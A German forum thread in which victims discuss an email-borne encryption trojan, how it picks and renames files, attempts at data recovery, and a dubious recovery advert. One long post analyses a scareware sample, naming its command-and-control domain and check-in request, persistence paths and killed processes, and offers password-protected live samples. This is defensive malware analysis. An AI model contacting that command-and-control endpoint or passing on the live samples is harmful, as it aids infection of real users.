Ich werde heute oder morgen die Originalplatte bekommen. Ich hoffe, das ich die $03-Datei darauf finde. $02 war jedenfalls drauf.
=> ich hab' glücklicherweise die Platte direkt ausgebaut und bisher nur ausgelesen...

gruß
Jochen

Offensichtlich war im BIOS doch nicht umgestellt. Mein Fehler.

Jedenfalls weiter getestet.
Gestern Abend noch ein wenig gespielt an dem Rechner. Auf dem Rechner war AVG installiert und nach mehrmaligem Hochfahren zeigte AVG eine Meldung an, dass etwas gefunden wurde. Warum dies bei den ersten Malen Hochfahren nicht kam, weiß ich nicht. Möglicherweise hängt das mit dem Timing beim Start zusammen. Ich hatte ja die Notfall CD von PCM drin. Vielleicht hatte da der Startvorgang vom Trojaner etwas länger gedauert (weil das DVD Laufwerk anlief) und dadurch kam AVG zum Zuge. Jedenfalls ist es mir gestern noch gelungen, die Dokumente Ordner auf CD zu brennen. Bis jetzt habe ich nur Bilder gefunden, die in Ordnung waren. Vielleicht hat mein Kollege doch recht schnell die Internetverbindung unterbrochen, so dass der Trojaner nicht fertig war. Vielleicht gibt es aber in den vielen Ordnern schon Dateien, die verändert wurden? Dies wird mein Kollege noch prüfen.
Danach habe ich dann AVG gesagt, die gefundene Datei in Quarantäne zu verschieben und noch andere Einträge zu löschen und seitdem startet der Rechner normal hoch. Ich will heute nochmal mit GDATA Live CD drüberscannen und vielleicht brauche ich dann die Platte nicht neu formatieren. Gefunden hat AVG einen Eintrag in der Registry, dann unter Users ein Eintrag YXFURTYL.EXE dann unter Windows C:\Windows\SYSWOW64\explorer.exe. Jedenfalls wurden 3 Prozesse beendet, 1 Datei entfernt und 1 Regschlüssel gelöscht.

Original kam der Trojaner aus einer Email von web.de
Vielleicht gibt es die noch und ich kann diese zur Verfügung stellen.

Guten Tag allerseits,
auch ich bin über Umwege von diesem Virus befallen worde.
Mein Vater hatte letzte Woche eine Mail bekommen und die Datei geöffnet, da er persönlich angesprochen wurde und er die Absender-Adresse kannte.
Die Dateien sind "EngufdsXloQNxUfDa" in dieser Art verschlüsselt. Soweit ich das seh, sämtliche Office-Dateien, pdf, videos, bilder und mp3.
Ich bin ein bisschen überrascht, dass die Verschlüsselung so willkürlich zu sein scheint, also ich mein die verschlüsselten Dateien. Auf Systempartition C, ist keine einzige Datei verschlüsselt. Auf d,e und f sehr sehr viele bis alle. In einem Baum mit diversen Unterordnern sind manche Unterordner im Baum komplett verschlüsselt, manche komplett unverschlüsselt. Unabhängig vom Datum oder sonst irgendwas. Außerdem gibt es Ordner in denen nur ein paar Dateien verschlüsselt sind und sogar einen mit etwa 100 Dateien wo exakt eine Datei verschlüsselt wurde. Hängt das nur mit der tatsächlichen Speicheradresse der Dateien zusammen oder steckt mehr dahinter?

Noch eine kleine vermutlich bedeutungslose Anmerkung zum Thema:
Jemand hatte hier von 5100 Dateien gleichen Inhalts in einem Ordner berichtet wo ein verschlüsselter Dateiname doppelt vorkam. Könnte da nicht der Unix Timestamp eine Rolle spielen?
Ansonsten find ich EINEN doppelten Namen bei 5100 identischen Dateien merkwürdig.

lG
Matthias

Hallo Matthias

für jede Partition wird ein Thread gestartet, der rekursiv durch den Dateibaum läuft. Diese Threads laufen gleichzeitig. In jedem Thread wird zu jeder Datei ein neuer Dateiname und ein Passwort per Zufall generiert. Dieser Datensatz wird nach der Erstellung in einen gemeinsamen globalen Speicherbereich abgelegt. Am Schluß hat der Virus im Speicher einen langen String mit folgendem Aufbau: Altername<0a0d>Neuername<0a0d>Passwort<0a0d0a0d>.. .
Und genau so sieht auch eine entschlüsselte Datei Katalog.$02 aus - eine reine Textdatei.

Es gibt ein Limit für die Größe des Speicherbereichs in dem die Datensätze gesammelt werden. Sobald der Katalog dieses Limit erreicht hat werden keine weiteren Datensätze mehr angefügt. Wegen dieses Limits und der Gleichzeitigkeit der Threads kann es durchaus schon dazu kommen, dass nur eine Datei in einem Verzeichnis verschlüsselt wurde.
Vielleicht hat dein Vater sich auch unkooperativ verhalten und mitten in der Verschlüsselungsphase den Computer ausgeschaltet.

Vg Marcu

Wir retten alle Ihre Daten (ausser Windows XP). Auch nach Angriffen des neuesten Verschlüsselungs Trojaners!
PC, Laptop einschicken, 2 Tage später haben Sie alle Ihre Daten wieder!

Datenrettung bis 500 MB = € 45,00, je weitere 500 MB plus € 15,00.

Sinnvoll danach komplette Neuinstallation, mit allen Treibern und allen wichtigen Programmen = € 65,00

Computerfachgeschäft
{snip}

Euer Geschreibsel ohne ernsthafte Kontaktdaten wirkt wenig seriös. Solltet Ihr tatsächlich in der Lage sein, diesen Service zuverlässig anbieten zu können, dann hättet Ihr mit seriöseren Anzeigen garantiert mehr Erfolg.

Frage in die Runde: Spekulationen helfen niemandem weiter - gibt es Erfahrungsberichte mit o.g. "Anbieter"?

Ich bin da skeptisch... Kommt jemand aus Füssen oder näherer Umgebung und könnte dort einmal vorbeischauen? Adresse usw. gibts per PN. Und nein, ich hab mit denen nix zu tun

Den selben Text findet ihr forenübergreifend überall wo der Matsnu Virus diskutiert wird. Getrost ignorieren ...

so... aus 2 Tagen wurden 3 Wochen ;-(

habe heute erst die Platte bekommen. Und ScheiXXe, 36000 gelöschte Dateien, aber keine $03 darunter.
In temp stehen:

5CB41BEA4D4F48545341.$02 => 2.523.050 Bytes, Datum 1.6. 18:35
5CB41BEA4D4F485453416854.$ => 1048 Bytes, Datum 1.6. 18:30
5CB41BEA4D4F485453416854 => 1048 Bytes, Datum 2.6. 15:49

Wenn ich alles richtig verstanden habe, sollte die Datei aber 5CB41BEA4D4F48545341.$02 heißen und auch im $user\temp-Verzeichnis liegen (gelegen haben).


Ich habe mir zwar schon ein Programm geschrieben, welches die (hier wichtigen) OpenOffice-Calc-Dateien erkennt und automatisch wiederherstellt, aber mit Dateinamen wäre vieles einfacher und schöner.

Gruß
Joh

Hab mich ja schon gefreut, dass ich und meine Umgebung bisher von dem Ding verschont wurde. Bis heute, als es meinen Bruder erwischte.

Die bisherige Analyse hat aber ergeben, dass es ein völlig anderes Ding ist, das weder verschlüsselt noch irgendwelche Anstalten macht, Taskmanager und/oder Registry zu sperren. Wenn man die Analyse von VirusTotal (zum Zeitpunkt der Analyse - kurz nach der Infektion - erkannten gerade mal 4 Scanner etwas!) noch mit rein nimmt, liegt nahe, dass es wahrscheinlich eine noch nicht lange in Umlauf befindliche Scareware ist. Auch wenn es hier im Thread konkret um die Trojaner geht, die Daten verschlüsseln, so will ich meine Erkenntnisse hier trotzdem kundtun (außerdem bin ich hier im Forum angemeldet im Gegensatz zum Trojanerboard).

So sieht das Ding aus, wenn es aktiv geworden ist. Das Bild entspricht also keiner der bei bka-trojaner.de abgebildeten Varianten.

Vorwort zur Analyse: Wie das Teil auf den Rechner kam, ist bislang ein Rätsel . Wir vermuten, dass es via Browser (evtl. durch das nicht ganz aktuelle Flash) passierte, können aber in der Chronik desselben keine Seite ausmachen, die dafür verantwortlich gewesen sein könnte. Via Mail fällt definitiv aus, weil am heutigen Tage keine Mails mit Anhängen eingetroffen sind (die eh nicht geöffnet worden wären) und außerdem ein Mailprogramm verwendet wird, das einen eigenen HTML-Renderer hat (The Bat!), sofern man doch mal von der in erster Linie genutzten Textansicht auf HTML-Ansicht umschaltet.

Ein Wort zu den Anhängen:

• wireshark_filtered.7z ist wie der Name schon sagt ein Mitschnitt mit Wireshark, gelaufen auf infizierten System mit Adminrechten, gefiltert nach der IP des infizierten PCs (ein ungefilterter Mitschnitt ist ebenfalls verfügbar).
• Logfile1.7z ist ein Mitschnitt der Aktivitäten von Process Monitor (ebenfalls gelaufen mit Adminrechten), gefiltert nach "Category | is | Write". Es existiert auch ein kompletter Mitschnitt ohne diesen Filter, aber da das Teil selbst gepackt ~6 MiB groß ist, hab ich die Sache erstmal gelassen; bei Interesse einfach melden.
• WSManHTTPConfig.7z enhält die Scareware selbst, geschützt mit dem Passwort "infected". Außerdem wurde die enthaltene EXE so umbenannt, dass sie nicht direkt startbar ist. Bitte trotzdem nur runterladen, wenn man weiß, was man tut und sein Testsystem absichtlich infizieren will!
• 2104c1be.7z enthält eine Datei ohne Extension, die die Schadware während der Aktivität runterlädt oder erzeugt. Der Name ist dabei zufällig. Was das genau für eine Datei ist, weiß ich nicht, sieht im Lister vom Total Commander aber ähnlich wie eine Executable aus, deshalb ist das Archiv ebenfalls passwortgeschützt.

Die (grobe) Analyse im Detail:

• Die Datei WSManHTTPConfig.exe kontaktiert einen Server im Netz (#557 und #587 im Wireshark-Log), von dem er eine Nummer bekommt.
• Nach Kontaktierung des Servers fragt er den DNS nach
  markieren

  Code:

  fglolituns.in
  (Wireshark #840) und holt sich von ihm
  markieren

  Code:

  GET /fimage/gate.php?uid={795BAA1E-F792-A0A6-23F5-554C8CCF3BC1}&user=44100100&os=2 HTTP/1.1
  (Wireshark #843), wahrscheinlich, um sich bei seinem C&C zu melden und die Sprache zu ermitteln. Wenn man die komplette URL inkl. der Parameter an ein wget übergibt, bekommt man eine URL zurück, die unter anderem ein "DE" enthält.
• Anschließend holt er sich das darzustellende Bild von /pic/DETujP.dat (Wireshark #856) und /pic/DEBukF.dat (Wireshark #983)
• Nach dem Laden der beiden *.dat wird daraus offensichtlich das Bild gebaut (im Verzeichnis %AppData%\hellomoto) und nun geht's richtig los.
• Die ursprünglich gestartete EXE kopiert sich selbst nach
  markieren

  Code:

  %LocalAppData%\Microsoft\Windows\*random*\RMActivate_ssp.exe
  , löscht sich vom Ursprungsort [Ergänzung] und trägt sich im Autostart (HKCU) ein [/Ergänzung]. Der Verzeichnisname scheint dabei zufällig zu sein, der Dateiname hingegen nicht.
• Prozesse werden abgeschossen: explorer.exe und taskmgr.exe
• wuauclt.exe wird gestartet (zweifach). Die im Archiv befindliche EXE ist also wohl eine DLL, die von wuauclt.exe geladen wird (gesehen hab ich davon nix im Process Explorer, aber vielleicht hab ich was übersehen). Der Prozessor wird übrigens durch die eine Instanz der wuauclt.exe ganz ordentlich belastet (60 bis 70% auf einem Sockel A-System).

Verhaltensanalyse:

• Jeder Versuch, den Taskmanager zu starten, wird unterbunden (vielleicht auch abgeschossen) und die Scareware bringt sich wieder in den Vordergrund.
• Nach Töten der wuauclt.exe (die übrigens im Kontext des Nutzers läuft statt wie üblich als SYSTEM), ist die Scareware beendet. Das geht übrigens ganz gut von einem anderen PC aus mit
  markieren

  Code:

  taskkill.exe /S <infiziertes_System> /U Administrator /IM wuauclt.exe
• Ohne aktive Netzwerkverbindung kopiert sich die Schadware ins o.g. Verzeichnis und startet wuauclt.exe, diese aber nur in einer einzelnen Instanz und sehen tut man von der Schadware ebenfalls nichts. Selbst, wenn man danach die Netzwerkverbindung reaktiviert, bleibt es bei dieser Situation.

Falls jemandem langweilig sein sollte, kann er sich gerne mit den Anhängen vergnügen und eine genauere Analyse machen . Dieser Beitrag (inkl. der Anhänge) darf auch gerne im Trojanerboard verarbeitet werden. Ich werde das Sample und den Screenshot in jedem Fall an botfrei.de schicken.

MfG Dalai

PS: Ich glaub, das ist einer der längsten jemals von mir verfassten Forenbeiträge, in jedem Fall in diesem Forum .